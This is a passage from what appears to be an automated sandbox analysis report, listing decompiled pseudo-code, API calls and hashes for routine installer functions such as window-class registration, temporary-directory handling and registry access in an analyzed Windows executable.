                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: MZP
                                                                    • API String ID: 3490077880-2889622443
                                                                    • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                    • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                                    • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                    • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E004785F8(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSW _v44;
				WCHAR* _t8;
				int _t10;
				void* _t11;
				struct HWND__* _t15;
				long _t17;
				WCHAR* _t20;
				struct HWND__* _t22;
				WCHAR* _t24;

				 *0x6c7aa8 =  *0x6d2634;
				_t8 =  *0x6c7abc; // 0x4785dc
				_t10 = GetClassInfoW( *0x6d2634, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00414778 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t20 =  *0x6c7abc; // 0x4785dc
						UnregisterClassW(_t20,  *0x6d2634);
					}
					RegisterClassW(0x6c7a98);
				}
				_t24 =  *0x6c7abc; // 0x4785dc
				_t15 = E00414DA0(0x80, _t24, 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					_t17 = E0047845C(_a4, _a8); // executed
					SetWindowLongW(_t22, 0xfffffffc, _t17);
				}
				return _t22;
			}












                                                                    0x00478604
                                                                    0x0047860d
                                                                    0x00478619
                                                                    0x00478621
                                                                    0x00478623
                                                                    0x00478626
                                                                    0x00478634
                                                                    0x0047863c
                                                                    0x00478642
                                                                    0x00478642
                                                                    0x0047864c
                                                                    0x0047864c
                                                                    0x0047866f
                                                                    0x0047867a
                                                                    0x0047867f
                                                                    0x00478686
                                                                    0x0047868e
                                                                    0x00478697
                                                                    0x00478697
                                                                    0x004786a2

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                    • String ID:
                                                                    • API String ID: 4025006896-0
                                                                    • Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                    • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                                    • Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                    • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E006ACABC(signed char __eax, void* __ecx, void* __edx, void* __eflags) {
				long _t7;
				void* _t9;
				void* _t14;
				void* _t15;
				signed char* _t16;

				_t17 = __eflags;
				_push(__ecx);
				_t14 = __ecx;
				_t15 = __edx;
				 *_t16 = __eax;
				while(1) {
					E0060C158( *_t16 & 0x000000ff, _t15, _t17); // executed
					asm("sbb ebx, ebx");
					_t9 = _t9 + 1;
					if(_t9 != 0 || GetLastError() == 2 || GetLastError() == 3) {
						break;
					}
					_t7 = GetTickCount();
					_t17 = _t7 - _t14 - 0x7d0;
					if(_t7 - _t14 < 0x7d0) {
						Sleep(0x32);
						continue;
					}
					break;
				}
				return _t9;
			}








                                                                    0x006acabc
                                                                    0x006acabf
                                                                    0x006acac0
                                                                    0x006acac2
                                                                    0x006acac4
                                                                    0x006acac7
                                                                    0x006acacd
                                                                    0x006acad5
                                                                    0x006acad7
                                                                    0x006acada
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006acaf0
                                                                    0x006acaf7
                                                                    0x006acafc
                                                                    0x006acb00
                                                                    0x00000000
                                                                    0x006acb00
                                                                    0x00000000
                                                                    0x006acafc
                                                                    0x006acb0d

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountSleepTick
                                                                    • String ID:
                                                                    • API String ID: 2227064392-0
                                                                    • Opcode ID: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                                    • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                                    • Opcode Fuzzy Hash: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                                    • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AE3C8(long __eax, void* __ecx, void* __fp0) {
				void* __ebx;
				void* __ebp;
				long _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr* _t69;
				struct HWND__* _t72;
				int _t73;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				long _t126;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t147;

				_t147 = __fp0;
				_t95 = __ecx;
				_t23 = __eax;
				_t126 = __eax;
				_t131 = _t126 -  *0x6cd738; // 0x0
				if(_t131 == 0) {
					L28:
					return _t23;
				}
				_t24 =  *0x6d66f8; // 0x0
				_t93 = E00464CD0(_t24, __eax);
				_t1 = _t93 + 0x18; // 0x18
				_t100 = E0040A77C(_t1);
				_t28 =  *((intOrPtr*)(_t93 + 0x18));
				if(_t28 != 0) {
					_t28 =  *((intOrPtr*)(_t28 - 4));
				}
				E005CD600(_t100, _t95, _t28);
				E005C77C4();
				E005C77C4();
				 *0x6cd738 = _t126;
				_t104 =  *0x5cac34; // 0x5cac38
				E0040BFAC(0x6d66b8, _t104);
				_t98 =  *0x5cac34; // 0x5cac38
				E0040C278(0x6d66b8, _t98, _t93, _t147);
				if( *0x6d66e0 == 0x411 &&  *0x6d67f0 < 0x5010000 && E005C7F8C(L"MS PGothic", _t93) != 0) {
					E0040A5A8(0x6d66c8, L"MS PGothic");
					 *0x6d66ec = 0xc;
				}
				if( *((intOrPtr*)(_t93 + 0x1c)) == 0) {
					_t106 =  *0x6d6601; // 0x0
					E0040A644(0x6d6744, _t106);
				} else {
					E0040A644(0x6d6744,  *((intOrPtr*)(_t93 + 0x1c)));
				}
				if( *((intOrPtr*)(_t93 + 0x20)) == 0) {
					_t107 =  *0x6d6605; // 0x0
					E0040A644(0x6d6748, _t107);
				} else {
					E0040A644(0x6d6748,  *((intOrPtr*)(_t93 + 0x20)));
				}
				_t139 =  *((intOrPtr*)(_t93 + 0x24));
				if( *((intOrPtr*)(_t93 + 0x24)) == 0) {
					_t108 =  *0x6d6609; // 0x0
					E0040A644(0x6d674c, _t108);
				} else {
					E0040A644(0x6d674c,  *((intOrPtr*)(_t93 + 0x24)));
				}
				E005C9044( *0x6d66f4 & 0x000000ff);
				_t49 =  *0x6cded8; // 0x6d5c28
				_t10 = _t49 + 0x1e8; // 0x0
				E005C8FB8(0, _t98, E0040B278( *_t10), _t139);
				_t54 =  *0x6cded8; // 0x6d5c28
				_t11 = _t54 + 0xb0; // 0x0
				E005C8FB8(1, _t98, E0040B278( *_t11), _t139);
				_t59 =  *0x6cded8; // 0x6d5c28
				_t12 = _t59 + 0x164; // 0x0
				E005C8FB8(2, _t98, E0040B278( *_t12), _t139);
				_t64 =  *0x6cded8; // 0x6d5c28
				_t13 = _t64 + 0x164; // 0x0
				E005C8FB8(3, _t98, E0040B278( *_t13), _t139);
				_t113 =  *0x6cded8; // 0x6d5c28
				_t14 = _t113 + 0x2f8; // 0x0
				_t69 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t69,  *_t14, _t139);
				_t23 =  *0x6d6704; // 0x0
				_t128 =  *((intOrPtr*)(_t23 + 8)) - 1;
				if(_t128 < 0) {
					L26:
					if( *0x6d64a4 == 0) {
						goto L28;
					}
					_t72 =  *0x6d64a8; // 0x202b4
					_t73 = SendNotifyMessageW(_t72, 0x496, 0x2711, _t126); // executed
					return _t73;
				} else {
					_t129 = _t128 + 1;
					_t130 = 0;
					do {
						_t74 =  *0x6d6704; // 0x0
						_t94 = E00464CD0(_t74, _t130);
						_t77 = ( *(_t94 + 0x25) & 0x000000ff) - 1;
						if(_t77 == 0) {
							_t17 = _t94 + 4; // 0x4
							_t116 =  *0x6cded8; // 0x6d5c28
							_t18 = _t116 + 0x1c8; // 0x0
							_t23 = E0040A5A8(_t17,  *_t18);
						} else {
							_t79 = _t77 - 1;
							if(_t79 == 0) {
								_t19 = _t94 + 4; // 0x4
								_t118 =  *0x6cded8; // 0x6d5c28
								_t20 = _t118 + 0x94; // 0x0
								_t23 = E0040A5A8(_t19,  *_t20);
							} else {
								_t23 = _t79 - 1;
								if(_t23 == 0) {
									_t21 = _t94 + 4; // 0x4
									_t120 =  *0x6cded8; // 0x6d5c28
									_t22 = _t120 + 0xb8; // 0x0
									_t23 = E0040A5A8(_t21,  *_t22);
								}
							}
						}
						_t130 = _t130 + 1;
						_t129 = _t129 - 1;
					} while (_t129 != 0);
					goto L26;
				}
			}





































                                                                    0x006ae3c8
                                                                    0x006ae3c8
                                                                    0x006ae3c8
                                                                    0x006ae3cc
                                                                    0x006ae3ce
                                                                    0x006ae3d4
                                                                    0x006ae621
                                                                    0x006ae621
                                                                    0x006ae621
                                                                    0x006ae3dc
                                                                    0x006ae3e6
                                                                    0x006ae3e8
                                                                    0x006ae3f0
                                                                    0x006ae3f2
                                                                    0x006ae3f7
                                                                    0x006ae3fc
                                                                    0x006ae3fc
                                                                    0x006ae3ff
                                                                    0x006ae413
                                                                    0x006ae427
                                                                    0x006ae42c
                                                                    0x006ae437
                                                                    0x006ae43d
                                                                    0x006ae449
                                                                    0x006ae44f
                                                                    0x006ae45e
                                                                    0x006ae484
                                                                    0x006ae489
                                                                    0x006ae489
                                                                    0x006ae497
                                                                    0x006ae4ad
                                                                    0x006ae4b3
                                                                    0x006ae499
                                                                    0x006ae4a1
                                                                    0x006ae4a1
                                                                    0x006ae4bc
                                                                    0x006ae4d2
                                                                    0x006ae4d8
                                                                    0x006ae4be
                                                                    0x006ae4c6
                                                                    0x006ae4c6
                                                                    0x006ae4dd
                                                                    0x006ae4e1
                                                                    0x006ae4f7
                                                                    0x006ae4fd
                                                                    0x006ae4e3
                                                                    0x006ae4eb
                                                                    0x006ae4eb
                                                                    0x006ae509
                                                                    0x006ae50e
                                                                    0x006ae513
                                                                    0x006ae522
                                                                    0x006ae527
                                                                    0x006ae52c
                                                                    0x006ae53b
                                                                    0x006ae540
                                                                    0x006ae545
                                                                    0x006ae554
                                                                    0x006ae559
                                                                    0x006ae55e
                                                                    0x006ae56d
                                                                    0x006ae572
                                                                    0x006ae578
                                                                    0x006ae57e
                                                                    0x006ae585
                                                                    0x006ae58a
                                                                    0x006ae592
                                                                    0x006ae595
                                                                    0x006ae5fe
                                                                    0x006ae605
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006ae612
                                                                    0x006ae618
                                                                    0x00000000
                                                                    0x006ae597
                                                                    0x006ae597
                                                                    0x006ae598
                                                                    0x006ae59a
                                                                    0x006ae59c
                                                                    0x006ae5a6
                                                                    0x006ae5ac
                                                                    0x006ae5ae
                                                                    0x006ae5ba
                                                                    0x006ae5bd
                                                                    0x006ae5c3
                                                                    0x006ae5c9
                                                                    0x006ae5b0
                                                                    0x006ae5b0
                                                                    0x006ae5b2
                                                                    0x006ae5d0
                                                                    0x006ae5d3
                                                                    0x006ae5d9
                                                                    0x006ae5df
                                                                    0x006ae5b4
                                                                    0x006ae5b4
                                                                    0x006ae5b6
                                                                    0x006ae5e6
                                                                    0x006ae5e9
                                                                    0x006ae5ef
                                                                    0x006ae5f5
                                                                    0x006ae5f5
                                                                    0x006ae5b6
                                                                    0x006ae5b2
                                                                    0x006ae5fa
                                                                    0x006ae5fb
                                                                    0x006ae5fb
                                                                    0x00000000
                                                                    0x006ae59a

                                                                    APIs
                                                                    • SendNotifyMessageW.USER32(000202B4,00000496,00002711,-00000001), ref: 006AE618
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageNotifySend
                                                                    • String ID: (\m$MS PGothic
                                                                    • API String ID: 3556456075-219475269
                                                                    • Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                    • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                                    • Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                    • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0060D530(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x60d629);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E005C75E4( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E0060D294(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E0040B278(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E005CD508(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E0042302C( &_v36, _t54, 0);
						_v24 = _v36;
						E005C857C(_t54,  &_v40);
						_v20 = _v40;
						E005CD4D8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E00429008(_v16, 1);
						E004098C4();
					}
				}
				E0040A5A8(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E0060D630);
				E0040A228( &_v40, 3);
				return E0040A228( &_v16, 3);
			}


















                                                                    0x0060d530
                                                                    0x0060d530
                                                                    0x0060d531
                                                                    0x0060d533
                                                                    0x0060d538
                                                                    0x0060d538
                                                                    0x0060d53a
                                                                    0x0060d53c
                                                                    0x0060d53c
                                                                    0x0060d53f
                                                                    0x0060d540
                                                                    0x0060d542
                                                                    0x0060d544
                                                                    0x0060d546
                                                                    0x0060d547
                                                                    0x0060d54c
                                                                    0x0060d54f
                                                                    0x0060d552
                                                                    0x0060d559
                                                                    0x0060d561
                                                                    0x0060d568
                                                                    0x0060d578
                                                                    0x0060d57f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060d586
                                                                    0x0060d588
                                                                    0x0060d58e
                                                                    0x0060d59e
                                                                    0x0060d5a6
                                                                    0x0060d5b2
                                                                    0x0060d5ba
                                                                    0x0060d5c2
                                                                    0x0060d5ca
                                                                    0x0060d5d9
                                                                    0x0060d5de
                                                                    0x0060d5e8
                                                                    0x0060d5ed
                                                                    0x0060d5ed
                                                                    0x0060d58e
                                                                    0x0060d5fc
                                                                    0x0060d601
                                                                    0x0060d603
                                                                    0x0060d606
                                                                    0x0060d609
                                                                    0x0060d616
                                                                    0x0060d628

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: .tmp
                                                                    • API String ID: 1375471231-2986845003
                                                                    • Opcode ID: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                                    • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                                    • Opcode Fuzzy Hash: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
                                                                    • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 70%
                                                                    			E006ACB10(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char* _t12;
				long _t13;
				void* _t15;
				void* _t22;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_t22 = __ebx;
				_push(0);
				_push(_t35);
				_push(0x6acba2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				E006255B8(0);
				E006255A4(0);
				if( *0x6d6530 != 0) {
					_t12 =  *0x6cdfdc; // 0x6d62e4
					if( *_t12 != 0) {
						E0061583C(0);
					}
					_t13 = GetTickCount();
					_t29 =  *0x6d6530; // 0x0
					_t15 = E0060DCC8(0, _t22, 1, _t29, _t13, E006ACABC, 0, 0, 1, 1); // executed
					if(_t15 == 0) {
						_t26 =  *0x6d6530; // 0x0
						E0040B4C8( &_v8, _t26, L"Failed to remove temporary directory: ");
						E00616130(_v8, _t22, _t31, _t32);
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E006ACBA9);
				return E0040A1C8( &_v8);
			}














                                                                    0x006acb10
                                                                    0x006acb10
                                                                    0x006acb10
                                                                    0x006acb13
                                                                    0x006acb17
                                                                    0x006acb18
                                                                    0x006acb1d
                                                                    0x006acb20
                                                                    0x006acb25
                                                                    0x006acb2c
                                                                    0x006acb38
                                                                    0x006acb3a
                                                                    0x006acb42
                                                                    0x006acb46
                                                                    0x006acb46
                                                                    0x006acb58
                                                                    0x006acb60
                                                                    0x006acb68
                                                                    0x006acb6f
                                                                    0x006acb74
                                                                    0x006acb7f
                                                                    0x006acb87
                                                                    0x006acb87
                                                                    0x006acb6f
                                                                    0x006acb8e
                                                                    0x006acb91
                                                                    0x006acb94
                                                                    0x006acba1

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID: Failed to remove temporary directory: $bm
                                                                    • API String ID: 536389180-2673898769
                                                                    • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                    • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                                    • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                    • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AC180() {
				void* _v8;
				void* __ecx;
				void* _t9;
				long _t15;
				void* _t16;

				if( *0x6d67dd == 0) {
					_t16 = 0;
				} else {
					_t16 = 2;
				}
				_t9 = E005C7A14(_t16,  *((intOrPtr*)(0x6cd7ec + ( *0x6d67dc & 0x000000ff) * 4)), 0x80000002,  &_v8, 1, 0); // executed
				if(_t9 == 0) {
					E005C793C();
					E005C793C();
					_t15 = RegCloseKey(_v8); // executed
					return _t15;
				}
				return _t9;
			}








                                                                    0x006ac18c
                                                                    0x006ac192
                                                                    0x006ac18e
                                                                    0x006ac18e
                                                                    0x006ac18e
                                                                    0x006ac1b1
                                                                    0x006ac1b8
                                                                    0x006ac1c7
                                                                    0x006ac1d9
                                                                    0x006ac1e2
                                                                    0x00000000
                                                                    0x006ac1e2
                                                                    0x006ac1ea

                                                                    APIs
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
